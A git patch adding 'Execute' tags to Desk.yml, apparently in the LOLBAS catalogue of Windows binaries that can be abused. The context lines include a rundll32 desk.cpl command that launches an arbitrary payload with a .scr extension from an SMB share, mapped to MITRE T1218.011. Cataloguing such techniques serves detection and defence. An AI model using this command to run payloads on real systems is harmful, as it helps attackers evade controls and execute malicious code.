From 87241b3051445298fb770639bca5d5624d6cc79d Mon Sep 17 00:00:00 2001
From: hegusung <7390383+hegusung@users.noreply.github.com>
Date: Sun, 13 Oct 2024 18:13:30 +0200
Subject: [PATCH] Update Desk.yml Tags

Added Tags:
Execute: EXE
Execute: Remote
---
 yml/OSLibraries/Desk.yml | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/yml/OSLibraries/Desk.yml b/yml/OSLibraries/Desk.yml
index 163badf..935a6f5 100644
--- a/yml/OSLibraries/Desk.yml
+++ b/yml/OSLibraries/Desk.yml
@@ -11,6 +11,8 @@ Commands:
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
   - Command: rundll32.exe desk.cpl,InstallScreenSaver \\127.0.0.1\c$\temp\file.scr
     Description: Launch a remote executable with a .scr extension, located on an SMB share, by calling the InstallScreenSaver function.
     Usecase: Launch any executable payload, as long as it uses the .scr extension.
@@ -18,6 +20,9 @@ Commands:
     Privileges: User
     MitreID: T1218.011
     OperatingSystem: Windows 10, Windows 11
+    Tags:
+      - Execute: EXE
+      - Execute: Remote
 Full_Path:
   - Path: C:\Windows\System32\desk.cpl
   - Path: C:\Windows\SysWOW64\desk.cpl